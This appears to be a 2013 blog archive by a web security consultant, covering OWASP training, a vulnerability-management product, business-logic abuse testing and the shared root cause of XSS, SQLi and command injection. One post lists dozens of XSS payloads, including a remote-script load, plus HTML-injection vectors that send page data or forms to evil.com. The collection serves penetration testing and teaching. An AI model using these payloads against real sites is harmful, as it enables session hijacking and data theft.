Tuesday, October 29, 2013

RSA Europe 2013:

Our RSA Europe class was delivered yesterday in Amsterdam.
4 hours of defensive coding techniques.
It was good fun with about 100 fellow builders/breakers

It was a great day with myself (Eoin Keary) Jim Manico and Ashar Javed (The king of XSS).

Our slides are here:
https://www.owasp.org/images/1/18/MASTER-RSA2013.pdf

Ashar's slides are here:
http://slid.es/mscasharjaved/cross-site-scripting-my-love

Wednesday, August 14, 2013

Vulnerability Management 101 - edgescan

Vulnerability Management:

The age old penetration test is dead, long live the penetration test...So as discussed before a 1-off penetration test does not work, why?

  • Code changes - possible introduction of vulnerabilities
  • Framework vulnerabilities are discovered all the time  (see here )
  • Server/Hosting changes may give rise to a vulnerability
  • Patching - vulnerarability
  • Logical/Business logic vulnerability - from new features
  • etc etc

So, our 1-off penetration test is only a point-in-time assessment and has its place for deep-dive penetration tests but more often than not the value of a 1-off penetration test is erroded the day the report is finished...like driving a car out of a dealership, it looses half its value in an instant.

We decided to do something different..


How about a solution that provides...

  • Monthly or more frequent vulnerability assessments
  • Covers Layer 1-7 (host, protocol, server, IP, patch, webapp, framework etc etc).
  • Is manually verified by humans (not androids or monkeys!)
  • Integrates with many many other security services.
  • A single point to view your entire security posture across all OSI layers for you entire Internet presence.

Ths type of idea makes sense right?

We dont have experienced consultants running scans and chasing False positives
We dont have 300 reports to manage and attempt to track what, how when was fixed not to mention risk priority.

Bring forth...edgescan

For the Last year we have been developing a pretty decent vulnerability management tool.
It answers questions like
  • What are my high risk issues?
  • Where are my high risk issues?
  • How old are they?
  • What is vulnerability history for my assets?
  • Am I more or Less Secure than yesterday/last month last year?
Some screen shots of edgescan given a picture is worth 1000 words

 
Executive Dashboard:
What are my biggst security concerns on network and application layers? What is the history of each asset and what changes have occured..the dashboard answers such questions.
 
 

 

 
Vulnerability List
My to do list!! Ordered by risk, date, asset  etc etc. what do I need to remediate and which issues take a high priority. Also advice on how to fix discovered issues.
 
 
 
Asset List
Each of my assets organised by criticality. A snapshot of each asset. Is it more secure than the last scheduled assessment? are my issues in the network later (administration/config) or the application layer (development/devops)?
 
 
 
Reporting
Yes, you can download deep technical reports or executive level reports on one or more assets if you wish. Select date ranges for historic reporting also.
 
 





Wednesday, June 19, 2013

XSS Vectors:
Some from OWASP some from other places...
 
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
 >"><script>alert("XSS")</script>&
<body background="javascript: alert()">"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
<script>alert(1)</script>
‘</title><script>alert(1)<script>‘</title>
<– lorem ipsem–><script>alert(1)<script>–>
<FOO><![CDATA[]]><script>alert(1)</script>]]>
<input type=text name=foo value=a><script>alert(1)<script>>
<input type=text name=foo value=a/><script>alert(1)<script>>
<input type=text name=foo value=”“onevent=?//“>

"><bgsound src="javascript: alert()">"><iframe src="javascript: alert()”></iframe>
</textarea><iframe src="javascript: alert()”></iframe>
</textarea><bgsound src="javascript: alert()">
<script> var foo=”“;alert(1);//“;
<script> var foo=’‘;alert(1);//‘
<sCrIpT>alert('eoin');</ScRiPt>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28 &<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
#<img/src=%22%22onerror=alert(1)>
<img/src=”"onerror=alert(123)>
<a” href” onclick=alert(123)>foo</a>
<a”" href=”"onclick=alert(123)>foo</a>
<img%0a%0dsrc=”"%0a%0donerror=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type=”text” name=”foo” value=”“onmouseover=alert(123)//“>
<input type=’text’ name=’foo’ value=’‘onclick=alert(123)//‘>
<input type=”text” name=”foo” value=”“autofocus/onfocus=alert(123)//“>
<a href=”data:text/html,<script>alert(123)</script>”>foo</a>
<script src=”data:,alert(123)”></script>
<script src=”data:application/x-javascript,alert(123)”></script>
<script src=”data:text/javascript,alert(123)”></script>
<a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg”>foo</a>
<script src=”data:;base64,YWxlcnQoOSk”></script>
<a href=”data:text/html;charset=utf-16, %ff%fe%3cscript%3e alert(9) </script>?>foo</a>
<svg onload=”javascript:alert(123)” xmlns=”http://www.w3.org/2000/svg”></svg>
<svg xmlns=”http://www.w3.org/2000/svg”><g onload=”javascript:alert(123)”></g></svg>
<svg><script xlink:href=data:,alert(123)></script>
<svg xmlns=”http://www.w3.org/2000/svg”><a xmlns:xlink=”http://www.w3.org/1999/xlink” xlink:href=”javascript:alert(123)”><rect width=”1000? height=”1000? fill=”white”/></a></svg>
<script%0a%0dalert(123)</script>
<script%20<!–%20–>alert(123)</script>
<a href=”"&<img&amp;/onclick=alert(123)>foo</a>
<a”"id=a href=”onclick=alert(123)>foo</a>
<a href=”"&amp;/onclick=alert(123)>foo</a>
<script/id=”a”>alert(123)</script>
<img src=”>”onerror=alert(123)>
<img id=”><”class=”><”src=”>”onerror=alert(123)>
<img src=”\”a=”>”onerror=alert(123)>
<a id=’ href=”">’href=javascript:alert(123)>foo</a>
<a id=’href=http://web.site/’onclick=alert(123)>foo</a>
<a href= . ‘”\’ onclick=alert(123) ‘”‘>foo</a>
<img src=”\”‘<a href=’”>”‘onerror=alert(123)>
<a id=’http://web.site/’onclick=alert(123)<!–href=a>foo</a>–>
<img src=”‘”id=’<img src=”">’onerror=alert(123)>
<img src=”<img src=’<img src=.>’>”onerror=alert(123)>
<a href=javascript:alert(123) href href=” href=”">foo</a>
var a = "foo"+alert(123)//";
var a = "foo"&&alert(123)//";
var a = "foo"/alert(123)//";
(function(){alert(123)})()
window["alert"](123)
String.fromCharCode(0×61,0×62)
alert(/foo bar/.source)
window[/alert/.source](123)
angular.bind(self, alert, 123)()
angular.element.apply(alert(123))
Ember.run(null, alert, 123)
_.defer(alert, 123)
<img/src=”"onerror=alert(123)>
<a” href” onclick=alert(123)>foo</a>
<a”" href=”"onclick=alert(123)>foo</a>
<img%0a%0dsrc=”"%0a%0donerror=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type=”text” name=”foo” value=”“onmouseover=alert(123)//“>
<input type=’text’ name=’foo’ value=’‘onclick=alert(123)//‘>
<input type=”text” name=”foo” value=”“autofocus/onfocus=alert(123)//“>
<a href=”data:text/html,<script>alert(123)</script>”>foo</a>
<script src=”data:,alert(123)”></script>
<script src=”data:application/x-javascript,alert(123)”></script>
<script src=”data:text/javascript,alert(123)”></script>
<a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg”>foo</a>
<script src=”data:;base64,YWxlcnQoOSk”></script>
<a href=”data:text/html;charset=utf-16,%ff%fe%3cscript%3ealert(9)</script>?>foo</a>
<svg onload=”javascript:alert(123)” xmlns=”http://www.w3.org/2000/svg”></svg>
<svg xmlns=”http://www.w3.org/2000/svg”><g onload=”javascript:alert(123)”></g></svg>
<svg><script xlink:href=data:,alert(123)></script>
<svg xmlns=”http://www.w3.org/2000/svg”><a xmlns:xlink=”http://www.w3.org/1999/xlink” xlink:href=”javascript:alert(123)”><rect width=”1000? height=”1000? fill=”white”/></a></svg>
<script%0a%0dalert(123)</script>
<script%20<!–%20–>alert(123)</script>
<a href=”"&<img&amp;/onclick=alert(123)>foo</a>
<a”"id=a href=”onclick=alert(123)>foo</a>
<a href=”"&amp;/onclick=alert(123)>foo</a>
<script/id=”a”>alert(123)</script>
<img src=”>”onerror=alert(123)>
<img id=”><”class=”><”src=”>”onerror=alert(123)>
<img src=”\”a=”>”onerror=alert(123)>
<a id=’ href=”">’href=javascript:alert(123)>foo</a>
<a id=’href=http://web.site/’onclick=alert(123)>foo</a>
<a href= . ‘”\’ onclick=alert(123) ‘”‘>foo</a>
<img src=”\”‘<a href=’”>”‘onerror=alert(123)>
<a id=’http://web.site/’onclick=alert(123)<!–href=a>foo</a>–>
<img src=”‘”id=’<img src=”">’onerror=alert(123)>
<img src=”<img src=’<img src=.>’>”onerror=alert(123)>
<a href=javascript:alert(123) href href=” href=”">foo</a>
“+alert(123)//
“&&alert(123)//
“/alert(123)//
/foo bar/.source
/alert/.source
”>, alert(123)<iframe/src=http://xssed.com>alert(123)</scrihttp://pt>alert(123)
”>, ’></div>alert(123)<input><script>alert(123)</script></marquee>alert(123)”>
>”>, </p>alert(123)<marquee><script>alert(123)</script></title>alert(123)
”/>, </ScRiPt>alert(123)<title><script>alert(123)</script></SCRIPT>alert(123)
>”>, </form>alert(123)<b><script>alert(123)</script></input>alert(123)” t type=”hidden” />

 
 
HTML Injection Vectors : (Anti-CSP)
 
Non truncated single Quote:
Steals HTML following injection point until another single quote is encountered.
 
<img src='http://evil.com/log.do?
 
<base> Jumping:
Can be used to reroute forms without absolute paths.
Does not work ion IE (they obey WC3 <head> rule)

<base href='http://evil.com/'> <!-- injected code -->

Form rerouting:
Forms cant be nested. Injection of a form before legit Form reroutes the form to the injected destination

<form action='http://evil.com/log.do> <!-- Injected script -->

 

Wednesday, May 22, 2013



Cyber Security and Ireland


Ireland is not an Island....As many of you know I am passionate about how we as a country secure the systems, networks and the critical elements of our national infrastructure that we all depend on.

I was recently interviewed by the Irish Examiner for an article Cyber Crime: The New Battleground, they ran on the threat posed to Ireland by criminals and others with malicious intent.

To be honest criminals go where the money is. I don't think GDP of an individual country matters given we throw funding at security but nothing seems to improve too much.

Nation state attackers may be more conscious of geographic location for obvious reasons but overall its all just copper wire and IP numbers and 1's and 0's



Thursday, April 18, 2013

Breaking Bad - Business Logic Abuse.

There was a recent discussion on the OWASP Testing guide list, a project I used to lead, in relation to "How to test for business logic issues"

This is a real tough one to document in terms of "How to..."

In saying that some of the biggest simulated financial fraud attacks I have ever committed for clients were based around business logic and authorization logic attacks.

So how do we do it?

This how is see the world, you may or may not agree.
I look at an apps functionality as a Finite State Machine
Certain inputs make the machine transition to a different state. Some states can only be reached from certain other states. Certain states are idempotent and others are transactional and have a permanent impact.

We have a number of use cases to test this machine.

1. Positive use case - App does what it is meant to (positive sense)
2. Negative use case - App does what it is meant to (negative sense)
3. Abuse Case - User or data is trying to force app to do stuff it was not meant to do.

#3 above can be further broken down:
3a:  Apps logic is broken by abuse: The app is forced to skip or ignore or revert certain state conditions. - breaking-out of the state transition model. - Forceful browsing, Wizard bouncing etc.
3b:  Apps logic is broken by supplying it with data it did not expect. The app reacts and its state machine is broken by reacting in a certain way.
3c: App processes data albeit out of range or in wrong format and produces a useful result.

So we have a couple of types of test in order to break business logic:
Data manipulation (3b) - confusing the apps state based on input data.
State Transition attacks (3a) - break the apps transition model by sending it requests out of sequence for example.
Data Range attacks (3c) -
In many cases breaking the business logic of an application can be a combination of 3a and 3b above.

You say Tomato I say Tomato: (advice for QA and Developers):


  1. Build your test case for  positive data flow for business positive outcomes.
  2. Build your test case for positive data flow for business negative outcomes. - access denied, insufficient funds etc
  3. Build your expected error condition test cases.
  4. Build your test cases for each stateful condition the function can be in.
  5. Map out state transitions from one state to another.


Reverse Polarity - Introduce some chaos......

Build abuse test cases for positive business outcomes (1): Remove, add, corrupt, reverse input to the function. - Can you achieve a positive business outcome without obeying the state model or without supplying the function all the appropriate data.

Do the same with the negative outcomes(2).

Can we get the application to throw unexpected errors by breaking the assumptions of the state model?

Can we skip state transitions (A->B->C can we go from A->C or C->B)?

Break roles - become somebody!

Vertical:
Role Based Access Control is great for vertical sand boxing functionality. Well designed systems do not need to expose role based decisions to the client and such data does not need to go outside of the zone of trust (the server session state).

Horizontal:
This is generally less thought out. For some reason we obsess with RBAC.
Peer user types accessing each others information. Generally testing such controls yields returns. Such controls are critical in social networking environments; 100000's of peer users interacting in a complex discretionary access control modelled environment.














Tuesday, March 12, 2013

RSA 2013 San Fransisco.



Below is the link to our OWASP Training at RSA on the 24th Feb 2013
Myself (@eoinkeary) and Jim Manico (@manicode) delivered a 4 hour session to 400 developers, pen testers etc.
It was fun.


OWASP Slides RSA2013

Tuesday, January 8, 2013

XSS = SQLI = CMDi=?

Why do we look at Cross Site Scripting, Command Injection and SQL injection in different ways?

Why am I even writing about such old issues like SQLI, XSS, CMDi? Probably because they are very similar from a builder/prevention aspect but very different from a breaker/defender aspect.

The Result is different:

Cross Site Scripting (XSS):  is a payload delivery mechanism. The vulnerability is used to deliver the payload (warhead) in this case client side script which does something. The attack used against a user so the attacker can do other stuff: Malware upload, Social Engineering, Identity Theft etc.

Command Injection (CMDi): A direct attack on a system. Invoking system commands directly. Command injection is a payload attack as opposed to a delivery mechanism.

SQL Injection (SQLI): A direct attack on a system also. Direct access to data or system configuration. The SQL injection attack is also a payload attack.

The Root cause is the same: It all comes down to the same thing:  

Mixing up input data with source code / system commands 
OR 
Breaking out of the data context into the execution context.

XSS causes the browser to execute user supplied input as code. The input breaks out of the "Data" context and becomes execution context. 

SQLI causes the database or source code calling the database to confuse data [context] and ANSI SQL [ execution context], Command injection mixes up data [context] and the command [context].



One problem I see is the breakers trying to explain to builders a vulnerability or number of different vulnerabilities all of which to the builder are treated in a similar way (logically) but it all sounds highly complex.

Unless security consultants communicate in "Builder-speak" I don't see how this communication can be effective.


"Hey [builder guy], you have a couple of XSS's in your DOM and also some stored XSS. Coupled with some SQLI  some CSRF and some Click-jacking"......who exactly is expected to understand that?

in Builder speak :

"Hey [builder guy], some of the untrusted input, which you render back to the user. This can cause a client side security issue. You need to encode all input from untrusted sources so the browser does not mistake it as code. 
You also have a similar issue on your data layer. you need to parameterize untrusted input so it is not confused as code and executes resulting in unexpected issues. 
You have some logical issues in relation to how browsers work where requests can be sent on your behalf by using your session, also best not to let your site be iFramed unless you intend it to be this way as it can be used to dupe your clients into doing things they never intended to do."

- which is easier to understand (assuming you are not a security expert)?